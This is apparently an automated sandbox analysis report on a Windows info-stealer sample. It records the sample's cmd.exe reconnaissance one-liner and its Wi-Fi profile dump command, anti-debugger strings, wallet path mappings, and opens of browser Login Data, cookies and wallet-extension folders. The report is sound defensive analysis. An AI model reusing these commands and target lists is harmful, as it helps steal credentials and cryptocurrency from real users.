            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
            Source: C:\Windows\System32\net1.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA7C590 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF72AA7C590
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA96950 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF72AA96950

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ollydbg.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe PID: 6816, type: MEMORYSTR
            Source: Yara matchFile source: 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe PID: 6816, type: MEMORYSTR
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Cookies.txtJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Firefox\History.txtJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\network_info.txtJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\system_info.txtJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\process_info.txtJump to behavior
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Electrum": os.path.join(self.RoamingAppData, "Electrum", "wallets"),
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Jaxx": os.path.join(self.RoamingAppData, "com.liberty.jaxx", "IndexedDB", "file__0.indexeddb.leveldb"),
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Exodus": "aholpfdialjgjfhomihkjbmgjidlcdno",
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Ethereum": os.path.join(self.RoamingAppData, "Ethereum", "keystore"),
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Ethereum": os.path.join(self.RoamingAppData, "Ethereum", "keystore"),
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfndJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.filesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanentJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chromeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareportingJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieafJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkibJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackupsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.filesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.filesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pingsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archivedJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\eventsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.filesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumpsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
